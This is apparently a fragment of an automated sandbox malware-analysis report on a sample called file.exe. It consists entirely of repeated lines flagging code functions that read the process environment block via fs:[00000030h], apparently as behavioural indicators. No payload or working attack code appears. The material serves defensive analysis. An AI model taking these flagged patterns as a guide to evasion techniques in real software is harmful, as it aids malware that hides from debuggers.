                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01326420 mov eax, dword ptr fs:[00000030h]2_2_01326420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA430 mov eax, dword ptr fs:[00000030h]2_2_012DA430
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D8402 mov eax, dword ptr fs:[00000030h]2_2_012D8402
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D8402 mov eax, dword ptr fs:[00000030h]2_2_012D8402
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D8402 mov eax, dword ptr fs:[00000030h]2_2_012D8402
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132C460 mov ecx, dword ptr fs:[00000030h]2_2_0132C460
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CA470 mov eax, dword ptr fs:[00000030h]2_2_012CA470
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CA470 mov eax, dword ptr fs:[00000030h]2_2_012CA470
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CA470 mov eax, dword ptr fs:[00000030h]2_2_012CA470
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135A456 mov eax, dword ptr fs:[00000030h]2_2_0135A456
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE443 mov eax, dword ptr fs:[00000030h]2_2_012DE443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129645D mov eax, dword ptr fs:[00000030h]2_2_0129645D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C245A mov eax, dword ptr fs:[00000030h]2_2_012C245A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A64AB mov eax, dword ptr fs:[00000030h]2_2_012A64AB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132A4B0 mov eax, dword ptr fs:[00000030h]2_2_0132A4B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D44B0 mov ecx, dword ptr fs:[00000030h]2_2_012D44B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135A49A mov eax, dword ptr fs:[00000030h]2_2_0135A49A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A04E5 mov ecx, dword ptr fs:[00000030h]2_2_012A04E5
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131C730 mov eax, dword ptr fs:[00000030h]2_2_0131C730
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC720 mov eax, dword ptr fs:[00000030h]2_2_012DC720
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC720 mov eax, dword ptr fs:[00000030h]2_2_012DC720
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D273C mov eax, dword ptr fs:[00000030h]2_2_012D273C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D273C mov ecx, dword ptr fs:[00000030h]2_2_012D273C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D273C mov eax, dword ptr fs:[00000030h]2_2_012D273C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC700 mov eax, dword ptr fs:[00000030h]2_2_012DC700
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A0710 mov eax, dword ptr fs:[00000030h]2_2_012A0710
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D0710 mov eax, dword ptr fs:[00000030h]2_2_012D0710
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8770 mov eax, dword ptr fs:[00000030h]2_2_012A8770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0770 mov eax, dword ptr fs:[00000030h]2_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D674D mov esi, dword ptr fs:[00000030h]2_2_012D674D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D674D mov eax, dword ptr fs:[00000030h]2_2_012D674D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D674D mov eax, dword ptr fs:[00000030h]2_2_012D674D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01324755 mov eax, dword ptr fs:[00000030h]2_2_01324755
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132E75D mov eax, dword ptr fs:[00000030h]2_2_0132E75D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A0750 mov eax, dword ptr fs:[00000030h]2_2_012A0750
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2750 mov eax, dword ptr fs:[00000030h]2_2_012E2750
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2750 mov eax, dword ptr fs:[00000030h]2_2_012E2750
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A07AF mov eax, dword ptr fs:[00000030h]2_2_012A07AF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013547A0 mov eax, dword ptr fs:[00000030h]2_2_013547A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134678E mov eax, dword ptr fs:[00000030h]2_2_0134678E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C27ED mov eax, dword ptr fs:[00000030h]2_2_012C27ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C27ED mov eax, dword ptr fs:[00000030h]2_2_012C27ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C27ED mov eax, dword ptr fs:[00000030h]2_2_012C27ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A47FB mov eax, dword ptr fs:[00000030h]2_2_012A47FB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A47FB mov eax, dword ptr fs:[00000030h]2_2_012A47FB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132E7E1 mov eax, dword ptr fs:[00000030h]2_2_0132E7E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AC7C0 mov eax, dword ptr fs:[00000030h]2_2_012AC7C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013207C3 mov eax, dword ptr fs:[00000030h]2_2_013207C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A262C mov eax, dword ptr fs:[00000030h]2_2_012A262C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE627 mov eax, dword ptr fs:[00000030h]2_2_012BE627
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D6620 mov eax, dword ptr fs:[00000030h]2_2_012D6620
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D8620 mov eax, dword ptr fs:[00000030h]2_2_012D8620
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B260B mov eax, dword ptr fs:[00000030h]2_2_012B260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2619 mov eax, dword ptr fs:[00000030h]2_2_012E2619
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E609 mov eax, dword ptr fs:[00000030h]2_2_0131E609
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA660 mov eax, dword ptr fs:[00000030h]2_2_012DA660
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA660 mov eax, dword ptr fs:[00000030h]2_2_012DA660
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136866E mov eax, dword ptr fs:[00000030h]2_2_0136866E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136866E mov eax, dword ptr fs:[00000030h]2_2_0136866E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D2674 mov eax, dword ptr fs:[00000030h]2_2_012D2674
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BC640 mov eax, dword ptr fs:[00000030h]2_2_012BC640
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC6A6 mov eax, dword ptr fs:[00000030h]2_2_012DC6A6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D66B0 mov eax, dword ptr fs:[00000030h]2_2_012D66B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4690 mov eax, dword ptr fs:[00000030h]2_2_012A4690
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4690 mov eax, dword ptr fs:[00000030h]2_2_012A4690
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E6F2 mov eax, dword ptr fs:[00000030h]2_2_0131E6F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E6F2 mov eax, dword ptr fs:[00000030h]2_2_0131E6F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E6F2 mov eax, dword ptr fs:[00000030h]2_2_0131E6F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E6F2 mov eax, dword ptr fs:[00000030h]2_2_0131E6F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013206F1 mov eax, dword ptr fs:[00000030h]2_2_013206F1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013206F1 mov eax, dword ptr fs:[00000030h]2_2_013206F1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA6C7 mov ebx, dword ptr fs:[00000030h]2_2_012DA6C7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA6C7 mov eax, dword ptr fs:[00000030h]2_2_012DA6C7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132892A mov eax, dword ptr fs:[00000030h]2_2_0132892A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0133892B mov eax, dword ptr fs:[00000030h]2_2_0133892B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132C912 mov eax, dword ptr fs:[00000030h]2_2_0132C912
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298918 mov eax, dword ptr fs:[00000030h]2_2_01298918
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298918 mov eax, dword ptr fs:[00000030h]2_2_01298918
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E908 mov eax, dword ptr fs:[00000030h]2_2_0131E908
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131E908 mov eax, dword ptr fs:[00000030h]2_2_0131E908
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E096E mov eax, dword ptr fs:[00000030h]2_2_012E096E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E096E mov edx, dword ptr fs:[00000030h]2_2_012E096E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E096E mov eax, dword ptr fs:[00000030h]2_2_012E096E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01344978 mov eax, dword ptr fs:[00000030h]2_2_01344978
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01344978 mov eax, dword ptr fs:[00000030h]2_2_01344978
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C6962 mov eax, dword ptr fs:[00000030h]2_2_012C6962
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C6962 mov eax, dword ptr fs:[00000030h]2_2_012C6962
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C6962 mov eax, dword ptr fs:[00000030h]2_2_012C6962
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132C97C mov eax, dword ptr fs:[00000030h]2_2_0132C97C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01320946 mov eax, dword ptr fs:[00000030h]2_2_01320946
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374940 mov eax, dword ptr fs:[00000030h]2_2_01374940
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013289B3 mov esi, dword ptr fs:[00000030h]2_2_013289B3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013289B3 mov eax, dword ptr fs:[00000030h]2_2_013289B3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013289B3 mov eax, dword ptr fs:[00000030h]2_2_013289B3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A09AD mov eax, dword ptr fs:[00000030h]2_2_012A09AD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A09AD mov eax, dword ptr fs:[00000030h]2_2_012A09AD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A0 mov eax, dword ptr fs:[00000030h]2_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132E9E0 mov eax, dword ptr fs:[00000030h]2_2_0132E9E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D29F9 mov eax, dword ptr fs:[00000030h]2_2_012D29F9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D29F9 mov eax, dword ptr fs:[00000030h]2_2_012D29F9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136A9D3 mov eax, dword ptr fs:[00000030h]2_2_0136A9D3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013369C0 mov eax, dword ptr fs:[00000030h]2_2_013369C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AA9D0 mov eax, dword ptr fs:[00000030h]2_2_012AA9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D49D0 mov eax, dword ptr fs:[00000030h]2_2_012D49D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134483A mov eax, dword ptr fs:[00000030h]2_2_0134483A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134483A mov eax, dword ptr fs:[00000030h]2_2_0134483A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C2835 mov ecx, dword ptr fs:[00000030h]2_2_012C2835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C2835 mov eax, dword ptr fs:[00000030h]2_2_012C2835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DA830 mov eax, dword ptr fs:[00000030h]2_2_012DA830
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132C810 mov eax, dword ptr fs:[00000030h]2_2_0132C810
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132E872 mov eax, dword ptr fs:[00000030h]2_2_0132E872
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132E872 mov eax, dword ptr fs:[00000030h]2_2_0132E872
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01336870 mov eax, dword ptr fs:[00000030h]2_2_01336870
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01336870 mov eax, dword ptr fs:[00000030h]2_2_01336870
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B2840 mov ecx, dword ptr fs:[00000030h]2_2_012B2840
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4859 mov eax, dword ptr fs:[00000030h]2_2_012A4859
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A4859 mov eax, dword ptr fs:[00000030h]2_2_012A4859
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D0854 mov eax, dword ptr fs:[00000030h]2_2_012D0854
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A0887 mov eax, dword ptr fs:[00000030h]2_2_012A0887
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132C89D mov eax, dword ptr fs:[00000030h]2_2_0132C89D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136A8E4 mov eax, dword ptr fs:[00000030h]2_2_0136A8E4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC8F9 mov eax, dword ptr fs:[00000030h]2_2_012DC8F9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DC8F9 mov eax, dword ptr fs:[00000030h]2_2_012DC8F9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CE8C0 mov eax, dword ptr fs:[00000030h]2_2_012CE8C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013708C0 mov eax, dword ptr fs:[00000030h]2_2_013708C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CEB20 mov eax, dword ptr fs:[00000030h]2_2_012CEB20
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CEB20 mov eax, dword ptr fs:[00000030h]2_2_012CEB20
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01368B28 mov eax, dword ptr fs:[00000030h]2_2_01368B28
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01368B28 mov eax, dword ptr fs:[00000030h]2_2_01368B28
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131EB1D mov eax, dword ptr fs:[00000030h]2_2_0131EB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01374B00 mov eax, dword ptr fs:[00000030h]2_2_01374B00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129CB7E mov eax, dword ptr fs:[00000030h]2_2_0129CB7E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01372B57 mov eax, dword ptr fs:[00000030h]2_2_01372B57
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01372B57 mov eax, dword ptr fs:[00000030h]2_2_01372B57
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01372B57 mov eax, dword ptr fs:[00000030h]2_2_01372B57
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01372B57 mov eax, dword ptr fs:[00000030h]2_2_01372B57
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134EB50 mov eax, dword ptr fs:[00000030h]2_2_0134EB50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01336B40 mov eax, dword ptr fs:[00000030h]2_2_01336B40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01336B40 mov eax, dword ptr fs:[00000030h]2_2_01336B40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136AB40 mov eax, dword ptr fs:[00000030h]2_2_0136AB40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01348B42 mov eax, dword ptr fs:[00000030h]2_2_01348B42
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01298B50 mov eax, dword ptr fs:[00000030h]2_2_01298B50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01354B4B mov eax, dword ptr fs:[00000030h]2_2_01354B4B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01354B4B mov eax, dword ptr fs:[00000030h]2_2_01354B4B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01354BB0 mov eax, dword ptr fs:[00000030h]2_2_01354BB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01354BB0 mov eax, dword ptr fs:[00000030h]2_2_01354BB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0BBE mov eax, dword ptr fs:[00000030h]2_2_012B0BBE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0BBE mov eax, dword ptr fs:[00000030h]2_2_012B0BBE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132CBF0 mov eax, dword ptr fs:[00000030h]2_2_0132CBF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CEBFC mov eax, dword ptr fs:[00000030h]2_2_012CEBFC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8BF0 mov eax, dword ptr fs:[00000030h]2_2_012A8BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8BF0 mov eax, dword ptr fs:[00000030h]2_2_012A8BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8BF0 mov eax, dword ptr fs:[00000030h]2_2_012A8BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134EBD0 mov eax, dword ptr fs:[00000030h]2_2_0134EBD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C0BCB mov eax, dword ptr fs:[00000030h]2_2_012C0BCB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C0BCB mov eax, dword ptr fs:[00000030h]2_2_012C0BCB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C0BCB mov eax, dword ptr fs:[00000030h]2_2_012C0BCB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A0BCD mov eax, dword ptr fs:[00000030h]2_2_012A0BCD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A0BCD mov eax, dword ptr fs:[00000030h]2_2_012A0BCD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A0BCD mov eax, dword ptr fs:[00000030h]2_2_012A0BCD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CEA2E mov eax, dword ptr fs:[00000030h]2_2_012CEA2E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DCA24 mov eax, dword ptr fs:[00000030h]2_2_012DCA24
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DCA38 mov eax, dword ptr fs:[00000030h]2_2_012DCA38
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C4A35 mov eax, dword ptr fs:[00000030h]2_2_012C4A35
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C4A35 mov eax, dword ptr fs:[00000030h]2_2_012C4A35
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132CA11 mov eax, dword ptr fs:[00000030h]2_2_0132CA11
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DCA6F mov eax, dword ptr fs:[00000030h]2_2_012DCA6F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DCA6F mov eax, dword ptr fs:[00000030h]2_2_012DCA6F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DCA6F mov eax, dword ptr fs:[00000030h]2_2_012DCA6F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131CA72 mov eax, dword ptr fs:[00000030h]2_2_0131CA72
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131CA72 mov eax, dword ptr fs:[00000030h]2_2_0131CA72
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134EA60 mov eax, dword ptr fs:[00000030h]2_2_0134EA60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0A5B mov eax, dword ptr fs:[00000030h]2_2_012B0A5B
